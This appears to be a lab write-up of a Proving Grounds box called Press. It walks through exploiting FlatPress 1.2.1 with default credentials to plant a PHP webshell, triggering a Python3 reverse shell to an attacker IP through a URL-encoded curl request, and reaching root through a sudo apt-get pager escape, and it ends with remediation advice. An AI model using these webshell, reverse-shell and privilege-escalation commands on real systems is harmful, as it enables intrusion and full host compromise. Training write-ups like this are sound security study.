Box Overview

Press is a Linux machine from Offensive Security’s Proving Grounds featuring exploitation of FlatPress CMS and privilege escalation through apt-get sudo misconfiguration.

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.227.29 -T4 -oN first.scan -p-

Open Ports:

  • 22/tcp - SSH (OpenSSH 8.4p1 Debian)
  • 80/tcp - HTTP (Apache 2.4.56) - “Lugx Gaming Shop HTML5 Template”
  • 8089/tcp - HTTP (Apache 2.4.56) - FlatPress fp-1.2.1

Service Identification

Port 8089 is running FlatPress - a flat-file blogging engine (no database required).

Version identified: FlatPress fp-1.2.1

Exploitation Research

Vulnerability Discovery

searchsploit flatpress

Results:

Flatpress - Cross-Site Scripting                          | php/webapps/10688.txt
Flatpress 0.1010.1 - Multiple XSS                         | php/webapps/35896.txt
Flatpress 0.804 < 0.812.1 - Local File Inclusion          | php/webapps/9801.txt
Flatpress 1.0 - Remote Code Execution                     | php/webapps/29515.pl
Flatpress 1.0.3 - CSRF / Arbitrary File Upload            | php/webapps/39870.html

Target exploit: Remote Code Execution

Initial Exploitation Attempt

Attempted 29515.pl without success.

Successful Exploit

Working exploit: CVE-2023-XXXX - FlatPress RCE

Exploit Execution

python3 updated_exploit.py 192.168.227.29:8089 admin password

Output:

Exploiting...
Logging in...
Login Successful!
Shell uploading...
Your Shell is Ready: http://192.168.227.29:8089/fp-content/attachs/gssto.php
Shell Usage: http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=command

Webshell deployed!

Webshell Access

The exploit uploads a PHP webshell accessible at:

http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=command

Commands are passed via the 0 parameter.

System Reconnaissance

Check Python version for reverse shell payload:

curl "http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=which%20python3"
# /usr/bin/python3

Python3 available! ✅

Initial Access - Reverse Shell

Payload Generation

Generated Python3 reverse shell from revshells.com:

export RHOST="192.168.45.222";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

URL Encoding

URL-encoded the payload for safe transmission via GET parameter.

Reverse Shell Execution

Setup listener:

nc -nlvp 4444

Trigger payload:

curl "http://192.168.227.29:8089/fp-content/attachs/gssto.php?0=export%20RHOST%3D%22192.168.45.222%22%3Bexport%20RPORT%3D4444%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22%2Fbin%2Fbash%22%29%27"

Shell caught as www-data!

www-data@debian:/var/www/flatpress/fp-content/attachs$

System Enumeration

cd /home
ls -la
# Empty - no user home directories

cat /etc/passwd | grep -v nologin
# Only root has shell access

No obvious user flag location found.

Privilege Escalation

Sudo Enumeration

sudo -l

Output:

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get

Vulnerability: Sudo access to apt-get without password! 🎯

GTFOBins Research

Reference: GTFOBins - apt-get

The apt-get changelog command opens a pager (less/more) which can be escaped to spawn a shell.

Exploitation

Execute apt-get changelog

sudo apt-get changelog apt

Output:

Get:1 store: apt 2.2.4 Changelog
Fetched 487 kB in 0s (0 B/s)
WARNING: terminal is not fully functional
/tmp/apt-changelog-aDmE5L/apt.changelog  (press RETURN)

The changelog opens in a pager (similar to less).

Pager Escape

From within the pager, execute shell escape:

!/bin/sh

Root shell spawned! 🎯

# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag

cd /root
ls
# email8.txt  proof.txt

cat proof.txt
# a9c446d07f3f1454e2c942b9d13d6416

Root flag captured!

Get pwnd! 💀

Attack Chain Summary

  1. Port Scanning → Identified FlatPress on port 8089
  2. Vulnerability Research → Found FlatPress RCE exploit
  3. Webshell Upload → Exploited FlatPress to deploy PHP shell
  4. Reverse Shell → URL-encoded Python3 payload for stable shell
  5. Sudo Enumeration → Discovered apt-get sudo access
  6. GTFOBins Lookup → Found pager escape technique
  7. Privilege Escalation → Escaped changelog pager to root shell
  8. Root Access → Full system compromise

Key Takeaways

Vulnerabilities Exploited

  1. FlatPress RCE - Unauthenticated remote code execution
  2. Default Credentials - admin:password worked for exploit
  3. Sudo Misconfiguration - apt-get allowed without password
  4. Pager Escape - Less/more pagers allow shell spawning

Technical Details

FlatPress Exploitation

The exploit leverages:

  • Authentication bypass or default credentials
  • File upload vulnerability
  • PHP code execution through uploaded files

apt-get Privilege Escalation

How it works:

  1. apt-get changelog fetches package changelog
  2. Opens changelog in pager (less/more)
  3. Pager allows command execution via !command
  4. Commands execute with sudo privileges
  5. Spawning shell gives root access

Remediation

FlatPress Security

  • Update to latest patched version
  • Change default credentials immediately
  • Implement file upload restrictions
  • Validate and sanitize user inputs
  • Regular security audits

Sudo Configuration

# BAD - Allows privilege escalation
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get

# BETTER - Restrict to specific safe operations
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get update
www-data ALL=(ALL) NOPASSWD: /usr/bin/apt-get upgrade

# BEST - Use a package management wrapper
# Create custom script that safely calls apt-get
# Grant sudo only to that wrapper

Additional mitigations:

  • Avoid granting package managers to web users
  • Use configuration management tools instead
  • Implement proper access controls
  • Monitor sudo command execution
  • Regular sudo configuration audits

Tools Used

  • nmap
  • searchsploit
  • Python3 (exploit execution)
  • curl (webshell interaction)
  • netcat (reverse shell listener)
  • GTFOBins (privilege escalation reference)

Techniques

  • Service version enumeration
  • Public exploit research
  • Webshell deployment
  • Reverse shell generation with URL encoding
  • Sudo enumeration
  • Pager escape exploitation

GTFOBins Commands Reference

apt-get Changelog Escape

# Open changelog
sudo apt-get changelog <package>

# Inside pager, execute:
!/bin/sh
# or
!/bin/bash

Alternative apt-get Methods

# If apt has sudo access
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice

“When you see package managers in sudo, check GTFOBins first!”